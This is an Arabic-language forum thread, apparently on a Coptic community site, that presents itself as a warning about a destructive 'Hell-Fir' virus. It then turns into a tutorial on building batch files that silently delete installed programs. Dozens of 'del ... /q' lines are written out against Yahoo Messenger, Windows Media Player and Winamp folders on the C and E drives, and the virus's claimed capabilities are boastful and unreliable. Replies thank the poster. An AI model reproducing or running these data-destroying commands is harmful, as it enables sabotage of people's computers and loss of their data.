[Narmar]

هاى شباب انا اترددت كتير اوى فى تنزيل الموضووع ده بس للاسف لازم انزله ....
لازم نقاوم اللى بيحصل دة ...
فى شخصيه أبتكرت فيرس اسمه Hell - Fir الكلام اللى قايله عنه بالنص والكلام مش كامل حذفت منه كتيير لان بيستهدف الأقباط واليهوود وده الكلام اللى مكتووب عنه بالنص فأحذروو منه جدا جدا جدا

اقتباس

الفيروس الجديد مدمر الى اقصى درجة ممكنة و اليكم شرح عمل الفيروس

اقتباس

مدى سوء الفيروس : ملحوظة الاساءة مقسمة لمدى سوءه على الانترنت و الجهاز الشحصى و الخ تاثيرة على الانترنت : 1: ينسف اتصالك بالانترنت نهائيا و لا تستطيع الدخول اليه مهما فعلت 2: يوقف عمل كل برامج المحادثة مثل الياهو و الماسنجر و غيرهم 3: ينسف برامج تسريع عملية الداونلود للابد تأثيرة على الجهاز الشخصى : 1: يقوم بالغاء فاعلية برنامج task manegar و الغاء استعمال ازرار alt+shift+delete 2: ينسف اى برنامج حماية موجود بالجهاز الخاص لك مهما كان و تم بنجاح تجربة تاثير كل برامج الحماية الموجودة حتى الان لم يستطيع اى برنامج منهم التأثير على الفيروس 3: يمنع الدخول الى الريجيسترى ابديا 4: يحذف كل ملفات ذات الامتداد dll الموجودة داخل بارتيشن ال c 5: يحذف كل الملفات الموجودة داخل فولدر system32 6 : يمنع الدخول الى ال dos باى طريرقة ممكنة لها 7: يمنع دخول الويندووز نهائيا سواء عن طريق تشغيلة بشكل طبيعى او عن طريق ال save mode 8: يقوم بامر فورمات كامل لكل بارتيشانات الجهاز مما يدفع الضحية الى عمل f-sidk و فقدان اى بيانات على الهارد و جارى اضافة تقنية جديدة له ليتمكن من نسخ نفسة الى اى اجهزة متصلة ببعضها باى نوع من الشبكات ليس للفيروس اى تأثير سلبى على جهاز الكمبيوتر ماديا يعنى مش ممكن يحرق البوردة او الهارد او اى حاجة تانية لكن بدور دلوقتى على طريقة بناء فيروس اسمة x-dark يحرق كارت الشاشة الفيروس ينفذ تلك المهمات بمجرد ضغطة واحدة على ايكونة الفيروس زمن التنفيذ من 1 الى 3 ثوانى كأقصى حد لا يوجد برنامج حماية حتى الان يستطيع ايقاف عمل الفيروس يعمل مع بداية التشغيل للجهاز و بمجرد م تفتح الجهاز هيقفل و مش هيفتح تانى ابدا الا بعد عمل f-disk و جارى حاليا البحث عن طريقة لجعل الفيروس ينسخ نفسة الى الزاكرة المؤقتة الموجودة فى الرامات بحيث لن تتمكن من الخلاص منه الا بعد م ترمى الرامة

وده شرح فكره الفيرس ....

فكرة عن الفيروس : على حد علمى ان الفيروس مجموعة من الاوامر بتقوم بتشغيل نفسها بشكل ذاتى و غالبا بتكون اوامر معقدة و الاهم فيها تتابع تنفيذ الاوامر دى

يعنى ترتيب تشغيل الاوامر بحيث يشتغل الامر كذا اولا و بعدية الامر كذا ثانيا و هكذا
و الاهم انه ينسخ نفسة لاماكن حساسة فى الجهاز زى فولدر ال system32
و امتدادات الفيروسات غالبا exe او الامتداد الشهير dll
نييجى بقى لفكرة عمل الفيروس بتاعنا
كل برنامج بيتصطب على الجهاز بيتكون له فولدر داخل بارتيشن السى و بالتحديد program files
اوكى لغاية كدة تمام و100 فل وربعوميه ...
و البرنامج بيشتغل بصورة عادية جدا جدا طب لو الفولدر بتاع البرنامج الموجود داخل program files اتحذف ياترى البرنامج هيشتغل لا طبعا لان ملفاتة التنفيذية و ملفات الدل و برمجياتة كلها طارت فطبعا بالسلامه يا قلبى ...
يبقى من هنا بدأت الفكرة اننا نحذف الفولدر من جوة program files باوامر معينة موجودة فى ملف تكست نكتب جواة اوامر ينفذها بطريقة معينة و ذاتيا بدون اى مشاكل ومن هنا الفكره نفسها ...
مثلا برنامج الياهو yahoo
لو حد مصطب برنامج الياهو الطبيعى ان فى فولدر اسمة yahoo! موجود جوة فولدر program files على بارتيشن ال c

لاحظ الصورة السابقة
فى طريقة جميله بنستعملها فى عمل اسطوانات ذاتية التشغيل بنستخدم فيها الفلاش جميله قوى هديكم فكرة بسيطة عنها
الفلاش بيدعم امتداد ال bat و لا يدعم امتداد exe
طب انا مثلا عندى برنامج الياهو و عايز اشغلة فى الفلاش اعمل ايه
نجيب ايكونة الياهو اللى هنصطب منها البرنامج و نعمل جمبها ملف ورد و نكتب فيه الامر دة

كود:

start msgr8us.exe

ملف الورد او التكست اللى عملناه دة نسمية اى اسم تحبة انت لكن اهم حاجة امتدادة يكون bat
انا مثلا هسمية Narmar.bat
و لازم اايكونة التصطيب و البرنامج يكونو فى فولدر واحد
و بمجرد الضغط على ملف التكست اللى عملناه بعد م نغير امتدادة هنلاقى ان ايكونة التصطيب للياهو اشتغلت تمام التمام
طيب دة كدة امر التشغيل طيب امر الحذف
هنغير كلمة start و نكتب مكانة del
اوكى نبدا بقى نشوف هنحذف فولدر الياهو الموجود على بارتيشن السى ازاى
هنفتح ملف ورد او تكست ...
و نكتب الاوامر دى

كود:

del "c:\Program Files\Yahoo!\Common" /q

كود:

 
 
del "c:\Program Files\Yahoo!\Companion\Data" /q 
 
del "c:\Program Files\Yahoo!\Companion\Installs\cpn" /q

del "c:\Program Files\Yahoo!\Messenger" /q
del "c:\Program Files\Yahoo!\Messenger\cache" /q
del "c:\Program Files\Yahoo!\Messenger\ext" /q
del "c:\Program Files\Yahoo!\Messenger\games" /q
del "c:\Program Files\Yahoo!\Messenger\imvcache" /q
del "c:\Program Files\Yahoo!\Messenger\logs" /q
del "c:\Program Files\Yahoo!\Messenger\media" /q
del "c:\Program Files\Yahoo!\Messenger\plugin" /q
del "c:\Program Files\Yahoo!\Messenger\skins" /q
del "c:\Program Files\Yahoo!\Messenger\profiles" /q
del "c:\Program Files\Yahoo!\shared" /q
del "c:\Program Files\Yahoo!\shared\graphics" /q
 

شرحها كالتالى : انا بكتب جو الملف امر del الخاص بالحذف و بكتب مسار الملف اللى عايز احذفه علشان الفيروس يعرف مكانة و يطيرة

سيقوم الفيروس بحف اى ملفات موجودة على المسارات اللى تم كتابتها فى ملف الورد يعنى اى ملف لاى برنامج عايز تنسفة

اكتب امر الحذف و بعد كدة اضغط مسطرة و بعدين اكتب مسار الملف المراد حذف محتوياتة و متنساش تحط المسار بين علامات تنصيص
و تكتب /q لانك لو مش كتبتها هتظر رسالة تطلب تاكيد العملية
و بس يا شباب هى دى فكرة تدمير كل البرامج الموجوووودة على السى من خلال ملف ورد لن يقوم اى برنامج مقاوم للفيروس مهما كان باكتشافة باى شكل ....

باقى حاجة واحدة بس و هى اوامر الفورمات اللى ممكن نكتبها بس اعذرونى مش هقولها علشان سوء الاستعمال مش اكتر
على فكره الفكره رغم بساطتها بس الاداء بتاعها عالى جدا جدا جدا وفتااااااااااااك وهحاول اطوره اكتر من كده ...
و نقزل مثال كمان لضرب الميديا بلير مثلا بالاوامر دى ...

كود:

del "C:\Program Files\Windows Media Player" /q

كود:

 
 
del "C:\Program Files\Windows Media Player\Icons" /q 
 
del "C:\Program Files\Windows Media Player\Network Sharing" /q

del "C:\Program Files\Windows Media Player\Skins" /q
del "C:\Program Files\Windows Media Player\Visualizations" /q
del "e:\Program Files\Windows Media Player" /q
del "e:\Program Files\Windows Media Player\Icons" /q
del "e:\Program Files\Windows Media Player\Network Sharing" /q
del "e:\Program Files\Windows Media Player\Skins" /q
del "e:\Program Files\Windows Media Player\Visualizations" /q
 
 

اوامر تدمير ال winamp

كود:

del "C:\Program Files\Winamp" /q

كود:

 
 
del "C:\Program Files\Winamp\Plugins" /q 
 
del "C:\Program Files\Winamp\Plugins\avs" /q

del "C:\Program Files\Winamp\Plugins\dsp_sps" /q
del "C:\Program Files\Winamp\Plugins\milkdrop" /q
del "C:\Program Files\Winamp\Plugins\ml" /q
del "C:\Program Files\Winamp\Plugins\predixis musicmagic" /q
del "C:\Program Files\Winamp\Plugins\predixis musicmagic\images" /q
del "C:\Program Files\Winamp\Plugins\freeform\wacs\jpgload" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\about" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\dropdownlist" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\msgbox" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\statusbar" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\tooltips" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\checkbox" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\historyeditbox" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\pathpicker" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\tabsheet" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\combobox" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\menubutton" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\popupmenu" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\titlebox" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\wasabi" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\wasabi\fonts" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\wasabi\******s" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\wasabi\garbage" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\wasabi\window" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\wasabi\menu" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\groups" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\xui" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\xui\button" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\xui\standardframe" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\xui\editbox" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\xui\****" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\xui\slider" /q
del "C:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\xui\titlebar" /q
del "e:\Program Files\Winamp" /q
del "e:\Program Files\Winamp\Plugins" /q
del "e:\Program Files\Winamp\Plugins\avs" /q
del "e:\Program Files\Winamp\Plugins\dsp_sps" /q
del "e:\Program Files\Winamp\Plugins\milkdrop" /q
del "e:\Program Files\Winamp\Plugins\ml" /q
del "e:\Program Files\Winamp\Plugins\predixis musicmagic" /q
del "e:\Program Files\Winamp\Plugins\predixis musicmagic\images" /q
del "e:\Program Files\Winamp\Plugins\freeform\wacs\jpgload" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\about" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\dropdownlist" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\msgbox" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\statusbar" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\tooltips" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\checkbox" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\historyeditbox" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\pathpicker" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\tabsheet" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\combobox" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\menubutton" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\popupmenu" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\titlebox" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\wasabi" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\wasabi\fonts" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\wasabi\******s" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\wasabi\garbage" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\wasabi\window" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\wasabi\menu" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\groups" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\xui" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\xui\button" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\xui\standardframe" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\xui\editbox" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\xui\****" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\xui\slider" /q
del "e:\Program Files\Winamp\Plugins\freeform\xml\wasabi\xml\xui\titlebar" /q
 

ملحوظة مهمة جدا : بعض المستخدمين بيصطب نظامين زى الاكس بى وو الميلينيوم يعنى البارتيشانات الاساسية بتكون ال c و e

اعمل المسارات زى م عملتها فى الملفات السابقى و اعملها copy و انسخها تحتها و بعد كدة قم بتغيير حرف ال c الى حرف ال e و بس

وشكرا جدا جدا لانى عارف انى طولت عليكم شكرا جدا لحسن استماعكم

المصدر: †† ارثوذكس †† - من قسم: قسم الحماية من الهكر

[Team Work®]

ربنا يخليك حبيبي بجد شرح حلو قوى قوى قوى ومجهود فوق فوق فوق الرائع فعلا بجد

اشكرك

[IO-Mena]

المسيح الحى بيحمى ولاده من حاجات زى كده وبيكون معاهم

[Narmar]

اقتباس

المسيح الحى بيحمى ولاده من حاجات زى كده وبيكون معاهم

شكرا يا مينا